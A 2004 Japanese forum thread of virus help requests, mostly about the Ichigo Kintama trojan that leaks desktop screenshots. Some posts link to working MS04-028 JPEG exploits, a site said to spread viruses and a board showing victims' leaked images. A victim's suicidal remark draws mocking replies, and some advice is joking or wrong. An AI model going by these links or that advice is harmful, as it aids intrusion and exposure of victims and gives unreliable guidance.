$NtUninstallKB839643-DirectX9$があってさ、でもこれDirectX9入れたせいだと思うんだが・・
それにWindows Update 後にできるフォルダじゃなかったっけ?
もしかして俺釣られた?
600 :名無しさん@お腹いっぱい。:04/09/25 23:38:27
>>597
それ、検索したときの履歴がレジストリに残ってるだけだろ。
c:\windows直下で間違いない・・・はず。
>>599
ん?
コンピュータウィルス総合スレッド VOL.41
http://pc6.2ch.net/test/read.cgi/pcqa/1095335861/263
で質問したのとは別人?
それ、検索したときの履歴がレジストリに残ってるだけだろ。
c:\windows直下で間違いない・・・はず。
>>599
ん?
コンピュータウィルス総合スレッド VOL.41
http://pc6.2ch.net/test/read.cgi/pcqa/1095335861/263
で質問したのとは別人?
601 :名無しさん@お腹いっぱい。:04/09/25 23:42:28
>600
うん
500の質問に自信満々にレスしてたから
500に大丈夫と言っていいのか
俺の記憶違い(Windows Update 後にできるフォルダ)だったのか不安になっちゃってさ
で、質問板で聞けって500の人も言われてたから、一応「質問」で出たすれを検索してみたけど
聞いてないみたいだったんで被ってないと思って聞いてみた次第です
マルチみたいになって申し訳ないっす
うん
500の質問に自信満々にレスしてたから
500に大丈夫と言っていいのか
俺の記憶違い(Windows Update 後にできるフォルダ)だったのか不安になっちゃってさ
で、質問板で聞けって500の人も言われてたから、一応「質問」で出たすれを検索してみたけど
聞いてないみたいだったんで被ってないと思って聞いてみた次第です
マルチみたいになって申し訳ないっす
602 :名無しさん@お腹いっぱい。:04/09/26 08:11:41
再インストって再セットアップとは違う?
603 :名無しさん@お腹いっぱい。:04/09/26 08:15:18
>>602
同じです
同じです
604 :名無しさん@お腹いっぱい。:04/09/26 11:43:59
俺も質問! PC立ち上げてネットにつなぐと
「表示出来ない・・・」 つーのが延々と出てくる・・・・
なんだこりゃ??
「表示出来ない・・・」 つーのが延々と出てくる・・・・
なんだこりゃ??
605 :名無しさん@お腹いっぱい。:04/09/26 12:44:28
606 :名無しさん@お腹いっぱい。:04/09/26 13:48:28
「マイドキュメント」が
「マイドキュソメント」に
いつの間にか書き換えられてました・・・
そんなウイルスってございます?
「マイドキュソメント」に
いつの間にか書き換えられてました・・・
そんなウイルスってございます?
607 :名無しさん@お腹いっぱい。:04/09/26 13:54:44
608 :名無しさん@お腹いっぱい。:04/09/26 14:23:18
掲示板に故意にウイルスへのリンクを貼り付けたら犯罪になりませんか?
609 :名無しさん@お腹いっぱい。:04/09/26 14:34:44
ウィルス:BKDR_SURILAB
感染ファイル:C\WINDOWS\system32\SVKP.sys
と、トレンドマイクロのオンラインスキャンがおっしゃってるのですが
データベースにありません…感染ファイル消そうかと思ったけど、なんかヤバげなファイルだし、どうしましょう
感染ファイル:C\WINDOWS\system32\SVKP.sys
と、トレンドマイクロのオンラインスキャンがおっしゃってるのですが
データベースにありません…感染ファイル消そうかと思ったけど、なんかヤバげなファイルだし、どうしましょう
610 :名無しさん@お腹いっぱい。:04/09/26 14:40:08
611 :名無しさん@お腹いっぱい。:04/09/26 14:51:09
ウイルスに感染したらタスクに表示されますよね?
612 :名無しさん@お腹いっぱい。:04/09/26 15:00:21
ノートンでチェックしたら4つほど修復できないファイルが見つかり
検疫はできたのですが、この検疫ってのをした状態で放っておいて大丈夫ですか?
ウイルス名は
・BloodhoundExploit.6 (←×2)
・Trojanhorse (←×2)
検疫はできたのですが、この検疫ってのをした状態で放っておいて大丈夫ですか?
ウイルス名は
・BloodhoundExploit.6 (←×2)
・Trojanhorse (←×2)
613 :名無しさん@お腹いっぱい。:04/09/26 15:07:45
614 :名無しさん@お腹いっぱい。:04/09/26 15:19:34
苺きんたまウィルスにかかったようです
まとめサイトを参考にファイルを削除したのですが
削除したとたんフリーズしてしまいます
再起動するとパソコンのデータが消えてしまいます
どのアイコンをクリックしても動きません
再起動、終了を10回ほど繰り返すと元に戻ります
で、検索すると削除したはずのshellsystem.exeがまたあります
どうすればいいですか?
まとめサイトを参考にファイルを削除したのですが
削除したとたんフリーズしてしまいます
再起動するとパソコンのデータが消えてしまいます
どのアイコンをクリックしても動きません
再起動、終了を10回ほど繰り返すと元に戻ります
で、検索すると削除したはずのshellsystem.exeがまたあります
どうすればいいですか?
615 :名無しさん@お腹いっぱい。:04/09/26 15:22:53
616 :名無しさん@お腹いっぱい。:04/09/26 15:23:19
617 :名無しさん@お腹いっぱい。:04/09/26 15:24:36
>>615
難しすぎて何をいってるのかわかりません
難しすぎて何をいってるのかわかりません
あぼーん
619 :名無しさん@お腹いっぱい。:04/09/26 16:05:12
>>617
わからないなら再インストールしろ
わからないなら再インストールしろ
620 :名無しさん@お腹いっぱい。:04/09/26 16:10:44
>617
つーかさ615に書いてるのって初心者向け雑誌にすら書いてる様な事だぞ
ネット接続を切断、セーフモード、レジストリ
きつい様だがこれぐらいは最低限必要な知識と思う
セーフモードの入り方は買ったPCの説明書にも書いてるだろうからそれ参考に
再インストールするなら説明書みるなり、ネットで検索かけるなりで
つーかさ615に書いてるのって初心者向け雑誌にすら書いてる様な事だぞ
ネット接続を切断、セーフモード、レジストリ
きつい様だがこれぐらいは最低限必要な知識と思う
セーフモードの入り方は買ったPCの説明書にも書いてるだろうからそれ参考に
再インストールするなら説明書みるなり、ネットで検索かけるなりで
621 :名無しさん@お腹いっぱい。:04/09/26 16:13:39
すいません、質問させてください。
症状ですが、家に帰ってきてパソコンを立ち上げたら画面が青くなってました。
一応ノートンとアドウェアでチェックしスパイウェアは削除したのですが・・・
直らないので改善方法を教えていただけると助かります。
症状ですが、家に帰ってきてパソコンを立ち上げたら画面が青くなってました。
一応ノートンとアドウェアでチェックしスパイウェアは削除したのですが・・・
直らないので改善方法を教えていただけると助かります。
622 :名無しさん@お腹いっぱい。:04/09/26 16:16:50
623 :名無しさん@お腹いっぱい。:04/09/26 16:17:08
>>621
トマトが赤くなると医者が青くなると昔からいわれています。
トマトが赤くなると医者が青くなると昔からいわれています。
う、すいません。
えっと、全体的に青みがかっている感じです。
文字を見たり書いたりすることは可能な状態です。
えっと、全体的に青みがかっている感じです。
文字を見たり書いたりすることは可能な状態です。
625 :名無しさん@お腹いっぱい。:04/09/26 16:21:15
ん? モニターがいかれたって可能性は?
モニター自体のメニューを開くと普通に表示されるので、モニターは正常だと思うのですが・・・
627 :名無しさん@お腹いっぱい。:04/09/26 16:30:06
628 :名無しさん@お腹いっぱい。:04/09/26 16:31:15
629 :名無しさん@お腹いっぱい。:04/09/26 16:36:23
>>623
リンゴじゃなかったか?
リンゴじゃなかったか?
630 :名無しさん@お腹いっぱい。:04/09/26 16:42:44
>>617
F8キーを押しながら起動
F8キーを押しながら起動
えっと、解決しました。
原因はディスプレイにあったみたいで、
物置においてあったディスプレイにつないだらくっきり・・・・
こんなへたれの質問に答えて頂きありがとうございました。
原因はディスプレイにあったみたいで、
物置においてあったディスプレイにつないだらくっきり・・・・
こんなへたれの質問に答えて頂きありがとうございました。
633 :名無しさん@お腹いっぱい。:04/09/26 16:54:36
>>629
トマトです、ヨーロッパのことわざ
トマトです、ヨーロッパのことわざ
634 :名無しさん@お腹いっぱい。:04/09/26 17:15:30
an apple a day keeps doctor away
635 :名無しさん@お腹いっぱい。:04/09/26 17:19:44
636 :名無しさん@お腹いっぱい。:04/09/26 17:24:29
637 :名無しさん@お腹いっぱい。:04/09/26 17:31:27
>>635
システムの復元を無効にしてみた?
システムの復元を無効にしてみた?
638 :名無しさん@お腹いっぱい。:04/09/26 17:53:36
>>635
あんたじゃ無理 悲しいけど、フォーマットする
あんたじゃ無理 悲しいけど、フォーマットする
639 :名無しさん@お腹いっぱい。:04/09/26 19:34:07
640 :('A`)マンドクセ:04/09/26 19:53:10
>>639
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/
テンプレ実行せずに質問するとボコボコにされるから、ちゃんとテンプレ読めよ
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/
テンプレ実行せずに質問するとボコボコにされるから、ちゃんとテンプレ読めよ
641 :Bloodhound.Exploit.13:04/09/26 21:49:12
Bloodhound.Exploit.13
ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
ファイル名: CRASH-TEST.RenameToJPG
結果: デベロッパーノートを参照してください。
ファイル名: poc_poc.jpg
結果: デベロッパーノートを参照してください。
デベロッパーノート
:
CRASH-TEST.RenameToJPG This is a proof-of-concept program that does not contain
any malicious payload. You can delete it safely.
Poc_poc.jpg This is a proof-of-concept program that does not contain any malicious payload.
You can delete it safely.
このファイルにウィルスがいると判断しましたが、特に問題はありません。
詳しくはデベロッパーノートをご覧ください。
(C)2004 シマンテック・セキュリティ・レスポンス
(P)2004 シマンテック・セキュリティ・レスポンス
ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
ファイル名: CRASH-TEST.RenameToJPG
結果: デベロッパーノートを参照してください。
ファイル名: poc_poc.jpg
結果: デベロッパーノートを参照してください。
デベロッパーノート
:
CRASH-TEST.RenameToJPG This is a proof-of-concept program that does not contain
any malicious payload. You can delete it safely.
Poc_poc.jpg This is a proof-of-concept program that does not contain any malicious payload.
You can delete it safely.
このファイルにウィルスがいると判断しましたが、特に問題はありません。
詳しくはデベロッパーノートをご覧ください。
(C)2004 シマンテック・セキュリティ・レスポンス
(P)2004 シマンテック・セキュリティ・レスポンス
642 :Bloodhound.Exploit.13:04/09/26 21:49:35
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/09.html#20040916_MS04-028
発見者による解説
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00515.html
crash する exploit
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.09/msg00206.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00523.html
コマンドを実行するexploit が登場
http://www.k-otik.com/exploits/09222004.ms04-28.sh.php
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
http://www.k-otik.com/exploits/09232004.ms04-28-admin.sh.php
http://d.hatena.ne.jp/hideakii/20040924#1096004636
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/09.html#20040916_MS04-028
発見者による解説
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00515.html
crash する exploit
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.09/msg00206.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00523.html
コマンドを実行するexploit が登場
http://www.k-otik.com/exploits/09222004.ms04-28.sh.php
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
http://www.k-otik.com/exploits/09232004.ms04-28-admin.sh.php
http://d.hatena.ne.jp/hideakii/20040924#1096004636
643 :名無しさん@お腹いっぱい。:04/09/26 21:57:51
すみません、ルータに感染するウイルスはあるのでしょうか?
また、一つのルータで、一本のLANケーブルを二つのパソコンに交互に
繋いだ時、片方のパソコンがウイルスに感染していた場合、それに
さしていたLANケーブルをぬき、別のパソコンに繋いだ時、
そのパソコンも感染してしまうのでしょうか?
どうかよろしくお願いします。
また、一つのルータで、一本のLANケーブルを二つのパソコンに交互に
繋いだ時、片方のパソコンがウイルスに感染していた場合、それに
さしていたLANケーブルをぬき、別のパソコンに繋いだ時、
そのパソコンも感染してしまうのでしょうか?
どうかよろしくお願いします。
644 :名無しさん@お腹いっぱい。:04/09/26 22:09:08
質問です。
3年前に買ったVAIOなんですが前に入れておいたウィルス対策ソフトの
期限が切れたので早速買ってきた対策ソフト(SOURCENEXTウィルスセキュリティ2005)
を入れてみたんですが、ソフトの指示に従い再起動後、CDドライブが認識されなくなってしまい、
インターネットにも接続できない状態です。しかも入れたはずの対策ソフトが見当たりません。
今はサブPCから書き込みしています。何かアドバイスを頂けないでしょうか・・・
3年前に買ったVAIOなんですが前に入れておいたウィルス対策ソフトの
期限が切れたので早速買ってきた対策ソフト(SOURCENEXTウィルスセキュリティ2005)
を入れてみたんですが、ソフトの指示に従い再起動後、CDドライブが認識されなくなってしまい、
インターネットにも接続できない状態です。しかも入れたはずの対策ソフトが見当たりません。
今はサブPCから書き込みしています。何かアドバイスを頂けないでしょうか・・・
645 :名無しさん@お腹いっぱい。:04/09/26 22:16:46
>>644
コッチの方がいいかも・・・
【ソースネクスト】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50
スレの雰囲気は、読んでないからしらん。
コッチの方がいいかも・・・
【ソースネクスト】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50
スレの雰囲気は、読んでないからしらん。
646 :名無しさん@お腹いっぱい。:04/09/26 22:23:56
648 :迷惑だった:04/09/26 22:39:49
此処も
ウィルス 落としています
逮捕してください
homepage3.nifty.com/shiofuki/
ウィルス 落としています
逮捕してください
homepage3.nifty.com/shiofuki/
649 :名無しさん@お腹いっぱい。:04/09/26 22:48:30
>>648
逮捕はK察のお仕事。迷惑したならniftyに文句を言ってくらはい。
逮捕はK察のお仕事。迷惑したならniftyに文句を言ってくらはい。
650 :名無しさん@お腹いっぱい。:04/09/26 22:57:26
>>645>>646
レスthxです。
ウィルスセキュリティ2005を入れる前にもPCがいきなり再起動したりすることがあったのでウィルスの可能性もあるかと思いここに書き込んでみたんですが・・・
ちなみに今はセーフモードでしか動かせないです。
こんな症状のウィルスって無いんですかね・・・
レスthxです。
ウィルスセキュリティ2005を入れる前にもPCがいきなり再起動したりすることがあったのでウィルスの可能性もあるかと思いここに書き込んでみたんですが・・・
ちなみに今はセーフモードでしか動かせないです。
こんな症状のウィルスって無いんですかね・・・
651 :名無しさん@お腹いっぱい。:04/09/26 23:33:02
苺きんたまの事で、お願いします
よくわからない物がレジストリに表示されるんです。
感染しているかどうか不明だったので、Cドライブにshellsystem.exeがないか
検索しましたが、ありませんでした。それからregeditを開いて
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
を見ましたが、こちらにもありませんでした。ですが、
regeditで更にshellsystemを検索したところ、
shellsystemとshellsystem.exeがありました。
001"shellsystem"みたいな感じで…(この番号ははっきり覚えてません)。
セーフモードで起動してregeditでshellsystemを検索すると
やはり 000"shellsystem"と出ます。
下のステータスバーのところには、
マイコンピュータ\HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\
Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
とあります。普通に起動していた時も、検索結果でExplorer Bars…というのが見えました。
このregeditでの検索結果のshellsystemとshellsystem.exeが
何度削除しても復活しているんです。
該当ファイルはなかったんですが、やっぱり感染してたんでしょうか。
それと、どうすれば消えるんでしょうか…
長くてすみません。
よくわからない物がレジストリに表示されるんです。
感染しているかどうか不明だったので、Cドライブにshellsystem.exeがないか
検索しましたが、ありませんでした。それからregeditを開いて
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
を見ましたが、こちらにもありませんでした。ですが、
regeditで更にshellsystemを検索したところ、
shellsystemとshellsystem.exeがありました。
001"shellsystem"みたいな感じで…(この番号ははっきり覚えてません)。
セーフモードで起動してregeditでshellsystemを検索すると
やはり 000"shellsystem"と出ます。
下のステータスバーのところには、
マイコンピュータ\HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\
Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
とあります。普通に起動していた時も、検索結果でExplorer Bars…というのが見えました。
このregeditでの検索結果のshellsystemとshellsystem.exeが
何度削除しても復活しているんです。
該当ファイルはなかったんですが、やっぱり感染してたんでしょうか。
それと、どうすれば消えるんでしょうか…
長くてすみません。
652 :名無しさん@お腹いっぱい。:04/09/26 23:53:33
000にshellsystem、001にshellsystem.exeとあったので
000と001を右クリックして、そのまま削除を選んだのですが…
今再起動してみたら、この二つは消えていました。
というより、000と001が消えていました。
これってもしかしてまずいんでしょうか?
000と001を右クリックして、そのまま削除を選んだのですが…
今再起動してみたら、この二つは消えていました。
というより、000と001が消えていました。
これってもしかしてまずいんでしょうか?
654 :名無しさん@お腹いっぱい。:04/09/27 00:01:45
ttp://www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
一応ウィルス付きみたいだけど、Norton 付きでこれ踏んだ後スキャンしたら
Documents and Settings\*****i\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\
にTrojan.ByteVerifyが検出された。Nortonで 削除されたなら大丈夫かな?
一応ウィルス付きみたいだけど、Norton 付きでこれ踏んだ後スキャンしたら
Documents and Settings\*****i\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\
にTrojan.ByteVerifyが検出された。Nortonで 削除されたなら大丈夫かな?
655 :名無しさん@お腹いっぱい。:04/09/27 00:06:20
>>653
よいよい。それで、おっけー。
>>654
直リンじゃないから、いいんでないか?と思いつつ、
トロイの方はノートン先生で大丈夫と思うが、そういう
とこいってるとなると、スパイウエアあたりにやられて
そうな希ガス。
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレ4のAd-awareSEとSpybotS&Dで再チェックを
お勧めしマフ。
よいよい。それで、おっけー。
>>654
直リンじゃないから、いいんでないか?と思いつつ、
トロイの方はノートン先生で大丈夫と思うが、そういう
とこいってるとなると、スパイウエアあたりにやられて
そうな希ガス。
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレ4のAd-awareSEとSpybotS&Dで再チェックを
お勧めしマフ。
657 :名無しさん@お腹いっぱい。:04/09/27 00:31:49
virus bulletinみたいな評価サイトで
最近の評価が載ってるサイトありませんか
最近の評価が載ってるサイトありませんか
>652
ありがとう。安心して眠れそうです。
レスを頂くまで自力で調べてみてました。
〜Explorer Barsにあったshellsystemは、自分のOSの中身を検索したから
それが出てきた…という事なのでしょうか。感染もしていなかったみたいで、ほっとしました。
ありがとう。安心して眠れそうです。
レスを頂くまで自力で調べてみてました。
〜Explorer Barsにあったshellsystemは、自分のOSの中身を検索したから
それが出てきた…という事なのでしょうか。感染もしていなかったみたいで、ほっとしました。
660 :名無しさん@お腹いっぱい。:04/09/27 00:39:34
つか、>>651をよく見ればただの検索履歴ではないか
664 :名無しさん@お腹いっぱい。:04/09/27 00:59:20
一度検出されたウィルス(トロイ)が検出されなくなったら
駆除されたと考えていいんですかね?
今日トロイ付きのリンクを踏んでしまいました。
そのあとシマンテックのオンラインスキャンを実行した結果トロイが検出されました。
その後自分のパソコンにインストールされているノートン(定義は半年前に期限切れ)で
スキャンし、感染:1、駆除済み:1と出ました。
その後もう一度シマンテックでオンラインスキャンしたんですが何も検出されませんでした。
念のためウィルスバスターも試しましたが何も検出されませんでした。
これは大丈夫なのでしょうか?お願いします。
駆除されたと考えていいんですかね?
今日トロイ付きのリンクを踏んでしまいました。
そのあとシマンテックのオンラインスキャンを実行した結果トロイが検出されました。
その後自分のパソコンにインストールされているノートン(定義は半年前に期限切れ)で
スキャンし、感染:1、駆除済み:1と出ました。
その後もう一度シマンテックでオンラインスキャンしたんですが何も検出されませんでした。
念のためウィルスバスターも試しましたが何も検出されませんでした。
これは大丈夫なのでしょうか?お願いします。
665 :名無しさん@お腹いっぱい。:04/09/27 01:03:03
教えてください。
見事に苺きんたまにかかってしまったのですが、winnyをもっていなければ
デスクトップ画像がアップされないのでしょうか?
見事に苺きんたまにかかってしまったのですが、winnyをもっていなければ
デスクトップ画像がアップされないのでしょうか?
666 :名無しさん@お腹いっぱい。:04/09/27 01:06:12
>>665
大丈夫(^Д^)
大丈夫(^Д^)
>>666
ありがとうございます。
やたらと、shellsystem error というのが出てくるので
何かと思って検索したら苺きんたまでした。
このエラーが、つまり、winnyをもってないために
アップできなかったというエラーだったんでしょうか?
ありがとうございます。
やたらと、shellsystem error というのが出てくるので
何かと思って検索したら苺きんたまでした。
このエラーが、つまり、winnyをもってないために
アップできなかったというエラーだったんでしょうか?
668 :名無しさん@お腹いっぱい。:04/09/27 01:08:59
>>665
コレに関しては、nyは全然関係ないで〜す。
トロイ自体がうp&スレ爆撃しまーす。
>>666
こらこら、この悪魔w
>>664
シマンテック&トレンドマイクロ以上の知識と技術を
持ってる個人はそうそういませんよ〜。
コレに関しては、nyは全然関係ないで〜す。
トロイ自体がうp&スレ爆撃しまーす。
>>666
こらこら、この悪魔w
>>664
シマンテック&トレンドマイクロ以上の知識と技術を
持ってる個人はそうそういませんよ〜。
>>662
サンクス。最初は Java SDK を誤認したのかとオモタ。
サンクス。最初は Java SDK を誤認したのかとオモタ。
>>669
うp先は以下のとおりで〜す。
画像の一覧はこちら。重いけどリロード禁止!!5分くらいまてば表示される。
5分まっても表示されないやつは他の人の接続の邪魔になるからあきらめろ。
http://up.isp.2ch.net/upload/c=03okari/index.cgi
祭はこのあたりで〜す。(実況も同じ板でやってまーす)
【マターリ】苺きんたま監視所のまとめ&雑談ぱーと2
http://sakura02.bbspink.com/test/read.cgi/erolive/1096190772/l50
うp先は以下のとおりで〜す。
画像の一覧はこちら。重いけどリロード禁止!!5分くらいまてば表示される。
5分まっても表示されないやつは他の人の接続の邪魔になるからあきらめろ。
http://up.isp.2ch.net/upload/c=03okari/index.cgi
祭はこのあたりで〜す。(実況も同じ板でやってまーす)
【マターリ】苺きんたま監視所のまとめ&雑談ぱーと2
http://sakura02.bbspink.com/test/read.cgi/erolive/1096190772/l50
だめだ。うぷされてた。
本気で死にたい。
本気で死にたい。
673 :名無しさん@お腹いっぱい。:04/09/27 01:41:04
>>672
いきろw
いきろw
674 :名無しさん@お腹いっぱい。:04/09/27 01:41:10
|・_・)....
675 :名無しさん@お腹いっぱい。:04/09/27 01:41:18
>>672
(・∀・)コンニチハ!!
(・∀・)コンニチハ!!
676 :名無しさん@お腹いっぱい。:04/09/27 01:41:27
>>672
ィ`
ィ`
677 :名無しさん@お腹いっぱい。:04/09/27 01:41:29
まとめサイト
ttp://www.geocities.jp/ichigo_kintama/
苺きんたま監視所パート72
http://sakura02.bbspink.com/test/read.cgi/erolive/1096215700/
ここもね
678 :名無しさん@お腹いっぱい。:04/09/27 01:41:33
>>672
ふぁいと、だよっ(つД`)
ふぁいと、だよっ(つД`)
679 :名無しさん@お腹いっぱい。:04/09/27 01:41:35
記念
680 :名無しさん@お腹いっぱい。:04/09/27 01:41:51
>>672
ガンバレ!!
ガンバレ!!
681 :名無しさん@お腹いっぱい。:04/09/27 01:41:57
>>672
記念に名前をどうぞ
記念に名前をどうぞ
682 :名無しさん@お腹いっぱい。:04/09/27 01:42:12
>>672
哀れwwwwwwwwwwwww
哀れwwwwwwwwwwwww
683 :名無しさん@お腹いっぱい。:04/09/27 01:42:17
寿司より早く
684 :名無しさん@お腹いっぱい。:04/09/27 01:42:17
>>672
寿司でも食え
寿司でも食え
685 :名無しさん@お腹いっぱい。:04/09/27 01:42:21
>>672
次はいいことあるさ
次はいいことあるさ
686 :名無しさん@お腹いっぱい。:04/09/27 01:42:24
>>665
どれどれ???おせーてー、ついでに
,-――――――-.
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
どれどれ???おせーてー、ついでに
,-――――――-.
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
687 :名無しさん@お腹いっぱい。:04/09/27 01:42:32
ノートンはLiveUpdateしても29日までだえめですのでご注意を
今のところ自動で対応できてるアンチウイルスソフトはありません
今のところ自動で対応できてるアンチウイルスソフトはありません
688 :名無しさん@お腹いっぱい。:04/09/27 01:42:33
>>672
,-――――――-.
/ |
/ |
/ |
l"ジェンキン 寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
,-――――――-.
/ |
/ |
/ |
l"ジェンキン 寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
689 :名無しさん@お腹いっぱい。:04/09/27 01:42:37
>>672
どんまいでーす(^o^)/
どんまいでーす(^o^)/
690 :名無しさん@お腹いっぱい。:04/09/27 01:42:37
寿司の出前がきますよ、
691 :名無しさん@お腹いっぱい。:04/09/27 01:42:53
ジェンキン寿司
ここ違うw
ここ違うw
692 :名無しさん@お腹いっぱい。:04/09/27 01:43:00
イイ事あるさw
693 :名無しさん@お腹いっぱい。:04/09/27 01:43:02
\ 、 m'''',ヾミ、、 /
\、_,r Y Y ' 、 /';,''
、 ,\ヽ, | | y /、 ,;;,,'',
\、\::::::::::/, /,, ;;,
ヽ\ o 、 ,o / { ;;;;;;;,,
丿 [ \|:::|/ ] >"''''' <ガリ
>、.> U <,.<
ノ ! ! -=- ノ! ト-、
..''"L \\.".//_ | ゙` ]
\、_,r Y Y ' 、 /';,''
、 ,\ヽ, | | y /、 ,;;,,'',
\、\::::::::::/, /,, ;;,
ヽ\ o 、 ,o / { ;;;;;;;,,
丿 [ \|:::|/ ] >"''''' <ガリ
>、.> U <,.<
ノ ! ! -=- ノ! ト-、
..''"L \\.".//_ | ゙` ]
694 :名無しさん@お腹いっぱい。:04/09/27 01:43:09
>>672
がんばれよ
がんばれよ
695 :名無しさん@お腹いっぱい。:04/09/27 01:43:14
696 :名無しさん@お腹いっぱい。:04/09/27 01:43:23
記念カキコ
697 :名無しさん@お腹いっぱい。:04/09/27 01:43:25
おまえらw
698 :名無しさん@お腹いっぱい。:04/09/27 01:43:25
出前乙
あと>>672 がんがれ
あと>>672 がんがれ
699 :名無しさん@お腹いっぱい。:04/09/27 01:43:45
>>672
自分で対処出来ないようならしばらくネットするな
自分で対処出来ないようならしばらくネットするな
700 :名無しさん@お腹いっぱい。:04/09/27 01:43:47
\ 、 m'''',ヾミ、、 /
\、_,r Y Y ' 、 /';,''
、 ,\ヽ, | | y /、 ,;;,,'',
\、\::::::::::/, /,, ;;,
ヽ\ o 、 ,o / { ;;;;;;;,,
丿 [ \|:::|/ ] >"''''' <ガリで。
>、.> U <,.<
ノ ! ! -=- ノ! ト-、
..''"L \\.".//_ | ゙` ]
\、_,r Y Y ' 、 /';,''
、 ,\ヽ, | | y /、 ,;;,,'',
\、\::::::::::/, /,, ;;,
ヽ\ o 、 ,o / { ;;;;;;;,,
丿 [ \|:::|/ ] >"''''' <ガリで。
>、.> U <,.<
ノ ! ! -=- ノ! ト-、
..''"L \\.".//_ | ゙` ]
702 :名無しさん@お腹いっぱい。:04/09/27 01:44:43
おやじ、ガリ!
703 :名無しさん@お腹いっぱい。:04/09/27 01:44:50
>>672
ヤフーで「exe ファイル 捨てたい」で検索するんだ!
ヤフーで「exe ファイル 捨てたい」で検索するんだ!
704 :名無しさん@お腹いっぱい。:04/09/27 01:45:09
>>672
おちんちんを高速でしごくんだ!
おちんちんを高速でしごくんだ!
705 :名無しさん@お腹いっぱい。:04/09/27 01:45:16
まだyahooのトップページくらいならいいけどさ、
個人情報とかはやばいよな・・・・
個人情報とかはやばいよな・・・・
しかも相当恥ずかしいヤツを・・・。
何もかも割れてるし、知り合いが見てないことを祈るだけだ。
何回もアップされてたみたいだし、過去の2chの苺きんたまスレで
自分の画像がアップされてるのも見た。
さっきから何も手につかなくて、部屋の中うろうろしてる。
さっきまでお腹がすいていたはずなのに、そんなことどうでも良くなってる。
